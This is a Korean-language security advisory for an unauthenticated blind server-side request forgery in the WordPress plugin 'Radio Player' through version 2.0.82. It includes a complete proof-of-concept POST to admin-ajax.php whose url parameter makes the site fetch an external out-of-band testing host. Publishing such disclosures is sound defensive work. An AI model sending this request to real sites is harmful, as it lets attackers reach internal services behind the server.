
Radio Player <= 2.0.82 - 인증되지 않은 블라인드 서버 측 요청 위조
Radio Player <= 2.0.82 - 인증되지 않은 서버 측 요청 위조
플러그인 'Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress'는 2.0.82를 포함한 모든 버전에서 서버 측 요청 위조에 취약합니다. 이로 인해 인증되지 않은 공격자가 웹 애플리케이션에서 시작된 임의의 위치로 웹 요청을 보낼 수 있으며, 이를 사용해 내부 서비스의 정보를 조회하거나 수정할 수 있습니다.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8